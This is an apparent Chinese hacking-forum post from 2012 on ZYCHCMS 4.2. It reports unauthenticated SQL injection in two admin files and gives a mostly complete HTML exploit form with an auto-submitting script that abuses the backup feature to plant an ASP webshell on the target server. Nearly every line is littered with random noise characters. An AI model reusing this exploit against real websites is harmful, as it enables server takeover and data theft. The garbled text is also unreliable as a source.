& U. s; M2 A8 t; I: l- v) q
% w4 A! M8 o: j4 g$ \
2 U3 Z. h" b4 t( {5 ~' f( ^% i' V. L
! g& z. H. s& ` @7 z
影响版本:ZYCHCMS企业网站管理系统4.2(存在以下两个文件的版本应该是通杀)4 j( g6 T0 X# p$ O# k. `/ I
①SQL注射漏洞
4 a" P4 X2 B# A, {' e; S/ | 漏洞文件:/admin/add_js.asp & /admin/add_xm_jiang.asp
4 i8 w4 M5 @& B7 L 漏洞原因:未过滤* f- g" {7 O3 [/ r9 Q2 C
漏洞代码:
: p) ~1 U0 m( i6 Q W6 v- s& h, P 都是相同的,文件开头没有调用过滤文件/admin/seeion.asp,导致没有对当前权限进行判断,就直接操作数据库。
4 U; N6 Y1 V, y* g2 M. K 修复方法:在文件开头加入代码( F, ?) F, a# ]* K* c
1 h' j) Y/ a8 V
: |; @! |( i8 w4 c, M
②后台拿WBSHELL
D* N5 C: T8 D* o* v% [7 D0 N, ] 进入后台有一个数据库备份,可以通过本地提交突破创建.asp后缀文件夹,并将一句话备份进去。6 B. c$ ]- d- F5 K+ L
这里在网上找了一个,改了下,将就着用。
; A$ a& g0 t: p" y 以下是代码本地提交代码
3 n* Y6 ^# G( s# ` ; D8 G4 R7 ]3 z5 i3 Q1 Y% Z$ o
* O; z6 F1 N2 Y/ Y' H2 ?7 r: T, ^) T<form method=”post” action=”http://localhost/admin/Manage_backup.asp?action=Backup” name=add>% ~0 N" _& u3 j( N
<!–eg:http://127.0.0.1:99/admin/Manage_backup.asp?action=Backup–>, j# n9 p) J; O$ |0 X% g
<tr>
6 s1 @8 p# f6 O5 ~6 c <td height=”30″ background=”images/bg_list.gif”><div style=”padding-left:10px; font-weight:bold; color:#FFFFFF; text-align:left”>备份数据库</div></td>0 U* ]* I% K( r; p4 S3 u
</tr>
& h' |! ?1 Q$ v <tr>
8 H1 ]0 V) Y) F# y5 U; m4 x <td bgcolor=”#FFFFFF”><span class=”back_southidc”>, f/ A2 B Q0 ^, ?3 K0 G! b
</span>
) k: [6 I0 L% d* t" z <table width=”100%” border=”0″ align=”center” cellpadding=”5″ cellspacing=”0″ >
" G6 b8 U7 `6 S <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″ >3 F9 E- ^8 C& E5 {1 v
<td height=”25″ width=”30%” class=”td”><div align=”left”>当前数据库路径</div></td>4 B* t/ w5 r2 ^' k: V
<td width=”70%” class=”td”>90sec. K5 L9 v8 S8 d! C- w" B4 V, c1 E
<div align=”left”>7 ^1 e& g& o4 X% X( J( ^
<input type=”text” size=”30″ name=”DBpath” value=”此处为你在其网站上传的图片格式一句话路径” />
E( }: t" y0 U+ C5 d <!–eg:../uploadfile/image/Logo/20120803130885328532_ZYCH.jpg>
" L) r7 B0 v2 y <input type=”hidden” size=”50″ name=”bkfolder” value=”123.asp” />
, S) h5 w- Y' ^) Z3 e) R </div></td>4 O- W2 O& L* M. _" ~ t
</tr>: G$ v5 d2 C& O) U
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#FFFFFF’” bgcolor=”#FFFFFF”>
5 T. H6 C8 a- E; R) J <td height=”25″ width=”30%” class=”td”><div align=”left”>备份数据库名称</div></td>
$ L* y/ s6 v% @2 \& u <td class=”td”><div align=”left”>. }% h# u4 k8 b" T, U# x" h& O2 d/ d
<input type=”text” size=”30″ name=”bkDBname” value=”4.mdb” />
" P- E; r3 |* F. B* D3 x; a5 s [如备份目录有该文件,将覆盖,如沒有,将自动创建]</div></td>) [( Q* g. V& G! [/ h
</tr>$ Q) G0 L; S$ M7 ]
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″>
5 p6 f9 W: i, N9 r <td height=”25″ width=”30%” class=”td”><div align=”left”></div></td>
2 m4 P7 e- K8 { <td class=”td”><div align=”left”>6 Q1 d% E9 F9 B2 ]$ |
<input type=”submit” value=”确定备份” class=”btn”2 ]8 _8 `/ m9 D* z
</div></td>
% j/ H. R- x$ M: @0 b% N </tr>
0 g- p1 M0 T7 q$ b: Q3 c </table></td></tr></form>
- F) ]7 V `0 F2 G+ H& O! f% A </table>
9 G. K0 N) v1 U J# y# P& a. r& q </td>
1 ~! p8 V. C/ O8 b( n </tr>
. m# o; ^2 S- t6 o </table>
8 s; J; B* T8 s" T# w4 c0 | <script>
( x1 V$ s: D/ S6 c6 h document.all.add.submit();
: U1 M+ U5 p# C' D" G( r </script>1 }% y( L6 S/ s) h
4 {. e/ N& S* G6 w( |, [& j) `/ A- b) `+ c2 Q1 d5 g% [' Z# q/ p
. T$ @) C: {* J* C- g# [+ Y" S, P: ^
: T* [5 a+ u1 W9 v, @ C
/ y' x$ E) K' u& v, ?% Z
~/ C- C3 p1 Q* Z3 z! ]) f0 X7 j, ~
9 @1 u1 Y4 O; ~! y( @5 k4 `8 H$ b
( G; x2 U# R0 ~: |
|
发表于 2012-9-10 21:09:51
收藏
支持
反对